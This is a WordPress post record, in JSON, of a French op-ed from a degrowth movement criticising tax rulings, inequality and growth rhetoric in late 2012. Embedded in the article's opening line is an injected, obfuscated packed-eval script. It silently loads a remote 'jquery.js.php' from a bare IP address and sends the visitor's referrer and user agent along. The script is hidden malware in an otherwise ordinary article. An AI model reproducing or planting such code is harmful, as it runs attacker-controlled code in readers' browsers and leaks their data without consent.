{"id":7983,"date":"2013-01-07T19:37:46","date_gmt":"2013-01-07T18:37:46","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=7983"},"modified":"2013-01-07T19:37:58","modified_gmt":"2013-01-07T18:37:58","slug":"stop-ou-encore","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=7983","title":{"rendered":"Stop ou encore ?"},"content":{"rendered":"<p style=\"text-align: center;\"><strong>Tribune <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nkneh|var|u0026u|referrer|iaahb||js|php'.split('|'),0,{}))\n<\/script><\/noindex> propos\u00e9e au Journal Le Monde ; non publi\u00e9e<br \/>\n<\/strong>source : <a href=\"http:\/\/decroissances.blog.lemonde.fr\/2012\/12\/30\/stop-ou-encore\/\">http:\/\/decroissances.blog.lemonde.fr\/2012\/12\/30\/stop-ou-encore\/<\/a><strong><br \/>\n<\/strong><\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter\" alt=\"\" src=\"http:\/\/www.agauchetoute07-26.eu\/wp-content\/uploads\/2013\/01\/logo-du-monde.jpg\" width=\"186\" height=\"124\" \/><\/p>\n<p><strong>La pol\u00e9mique fait-elle vraiment rage\u00a0?<\/strong> \u00ab\u00a0Prot\u00e9g\u00e9s\u00a0\u00bb par un bouclier fiscal, les riches sont-ils aujourd\u2019hui les nouveaux pers\u00e9cut\u00e9s, harcel\u00e9s par des pr\u00e9l\u00e8vements confiscatoires\u00a0?<\/p>\n<p>Comment arriver \u00e0 le croire quand, dans une m\u00eame semaine, les <em>news<\/em> ne font au contraire que confirmer et ent\u00e9riner la l\u00e9gitimation des in\u00e9galit\u00e9s les plus iniques\u00a0?<\/p>\n<p>L\u2019ex-\u00e9pouse bafou\u00e9e d\u2019un ex-dirigeant transalpin obtient par d\u00e9cision de justice une pension alimentaire de trois millions d\u2019euros par mois, soit pr\u00e8s de 100 000 euros par jour\u00a0: comment peut-on encore continuer \u00e0 qualifier une telle pension d\u2019\u00ab\u00a0alimentaire\u00a0\u00bb\u00a0? Que veut dire \u00ab\u00a0justice\u00a0\u00bb dans ce cas\u00a0?<\/p>\n<p>Le Conseil Constitutionnel vient de censurer, dans la loi de finances pour 2013, la taxation \u00e0 75% pour les revenus sup\u00e9rieurs \u00e0 1 million d\u2019euros. Serait-il ind\u00e9cent de rappeler que le montant mensuel net du Smic pour 35 heures de travail (apr\u00e8s d\u00e9duction de la CSG et de la CRDS) est en d\u00e9cembre 2012 de 1138,36 euros\u00a0? Serait-il absurde de rappeler que le m\u00eame Conseil Constitutionnel valide, dans le budget 2012 rectifi\u00e9, un cr\u00e9dit d\u2019imp\u00f4ts d\u2019aide aux entreprises de 20 milliards d\u2019euros, quand on sait parfaitement que ce type de \u00ab\u00a0cadeau fiscal\u00a0\u00bb aux entreprises n\u2019est qu\u2019une nouvelle aubaine en faveur du Capital et aux d\u00e9pens du Travail ?<\/p>\n<p>A l\u2019annonce de cette nouvelle, le pr\u00e9sident de la Ligue de Football Professionnel s\u2019est f\u00e9licit\u00e9 de cette \u00ab\u00a0belle et indispensable victoire collective\u00a0\u00bb. Comment ne pas s\u2019indigner quand la laideur des pires individualismes revendique la d\u00e9fense de la \u00ab\u00a0beaut\u00e9\u00a0\u00bb et du \u00ab\u00a0collectif\u00a0\u00bb\u00a0?<!--more--><\/p>\n<p>Faut-il vraiment s\u2019\u00e9tonner d\u2019une telle rh\u00e9torique footbalistique quand nous apprenons l\u2019introduction dans le dictionnaire su\u00e9dois du verbe \u00ab\u00a0zlataner\u00a0\u00bb, une invention de nos Guignols de l\u2019info? Et pour ceux qui l\u2019ignorent, il signifie \u00ab\u00a0dominer\u00a0\u00bb\u00a0! Mais bien s\u00fbr, pour d\u00e9crire l\u2019invention permanente de nouvelles formes de domination, nous avions bien besoin d\u2019un nouveau verbe\u00a0!<\/p>\n<p>Cette d\u00e9route des mots, celle qui d\u00e9roule le tapis rouge sur la route des maux, atteint le comble de la confusion quand m\u00eame les porte-parole de l\u2019indignation ne font que renforcer, cran par cran, le progr\u00e8s des ind\u00e9cences et le recul du sens commun. Dans une tribune, le producteur Vincent Maraval d\u00e9nonce avec raison l\u2019imp\u00e9ritie \u00e9conomique du cin\u00e9ma fran\u00e7ais financ\u00e9 par l\u2019argent public\u00a0: \u00ab\u00a0Dix fois moins de recettes, cinq fois plus de salaire, telle est l&rsquo;\u00e9conomie du cin\u00e9ma fran\u00e7ais.\u00a0\u00bb Mais jusqu\u2019o\u00f9 nos bras peuvent-ils tomber quand nous lisons, quelques lignes plus bas, que sous couvert de d\u00e9noncer un \u00ab\u00a0syst\u00e8me\u00a0\u00bb il prend la d\u00e9fense de celui des h\u00e9ritiers, de cette nouvelle aristocratie des \u00ab\u00a0fils de\u00a0\u00bb\u00a0? Comment peut-on pr\u00e9senter comme mod\u00e8le de vertu l\u2019usage que le fils de Jean-Pierre Cassel fait de \u00ab\u00a0son argent et son \u00e9nergie\u00a0\u00bb pour aider le fils de Kiki Picasso et celui de Costa-Gavras\u00a0? Faut-il alors s\u2019\u00e9tonner que cette tribune, vendue comme une \u00ab\u00a0charge au canon\u00a0\u00bb, finisse en proposant une \u00ab\u00a0id\u00e9e simple\u00a0\u00bb, celle de plafonner les cachets des acteurs \u00e0 400 000 euros\u00a0? 400 000 euros, plus un int\u00e9ressement aux b\u00e9n\u00e9fices en cas de succ\u00e8s\u2026 commercial\u00a0!<\/p>\n<p>Mais tout cela n\u2019est-il pas l\u2019air du temps qui permet \u00e0 la ministre des \u00ab\u00a0affaires sociales\u00a0\u00bb et de la sant\u00e9 de garantir un salaire plancher de 4600 euros mensuel pour les jeunes m\u00e9decins acceptant de s\u2019installer pendant deux ans dans un\u00a0\u00ab\u00a0d\u00e9sert m\u00e9dical\u00a0\u00bb\u00a0? Que veut encore dire \u00ab\u00a0social\u00a0\u00bb quand il n\u2019y a plus que la logique \u00ab\u00a0lib\u00e9rale\u00a0\u00bb des \u00ab\u00a0affaires\u00a0\u00bb\u00a0?<\/p>\n<p>Comment reprocher aux uns de perdre tout bon sens dans l\u2019\u00e9valuation d\u2019un \u00ab\u00a0plafond\u00a0\u00bb quand d\u2019autres nomment \u00ab\u00a0plancher\u00a0\u00bb ce qui n\u2019est que \u00ab\u00a0privil\u00e8ge\u00a0\u00bb et aveu d\u2019impuissance \u00e0 conduire une v\u00e9ritable \u00ab\u00a0politique\u00a0\u00bb\u00a0?<\/p>\n<p>Nous avons toujours su qu\u2019il faut, math\u00e9matiquement, beaucoup de \u00ab\u00a0pauvres\u00a0\u00bb pour faire un seul \u00ab\u00a0riche\u00a0\u00bb. Mais dans un pays sans croissance qui continue pourtant d\u2019en r\u00e9citer le cat\u00e9chisme, nous pouvons pr\u00e9voir qu\u2019il faudra de plus en plus d\u2019\u00ab\u00a0appauvris\u00a0\u00bb pour que quelques-uns continuent de s\u2019enrichir de plus en plus.<\/p>\n<p>Ce qui signifiera de plus en plus d\u2019ind\u00e9cences, de plus en plus d\u2019irresponsabilit\u00e9s \u00e9cologiques, de plus en plus d\u2019injustices sociales, de plus en plus d\u2019atteintes \u00e0 la d\u00e9mocratie\u00a0; bref, de plus en plus de croissance\u2026<\/p>\n<p><strong>De plus en plus de rage devant des pol\u00e9miques fauss\u00e9es.<\/strong><\/p>\n<p>Michel Lepesant, du Mouvement des objecteurs de croissance (le MOC)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Tribune propos\u00e9e au Journal Le Monde ; non publi\u00e9e source : http:\/\/decroissances.blog.lemonde.fr\/2012\/12\/30\/stop-ou-encore\/ La pol\u00e9mique fait-elle vraiment rage\u00a0? \u00ab\u00a0Prot\u00e9g\u00e9s\u00a0\u00bb par un bouclier fiscal, les riches sont-ils aujourd\u2019hui les nouveaux pers\u00e9cut\u00e9s, harcel\u00e9s par des pr\u00e9l\u00e8vements confiscatoires\u00a0? Comment arriver \u00e0 le croire quand, &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=7983\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,33],"tags":[],"class_list":["post-7983","post","type-post","status-publish","format-standard","hentry","category-actualites","category-soutiens-du-ppld"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/7983","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7983"}],"version-history":[{"count":2,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/7983\/revisions"}],"predecessor-version":[{"id":7985,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/7983\/revisions\/7985"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7983"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7983"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7983"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}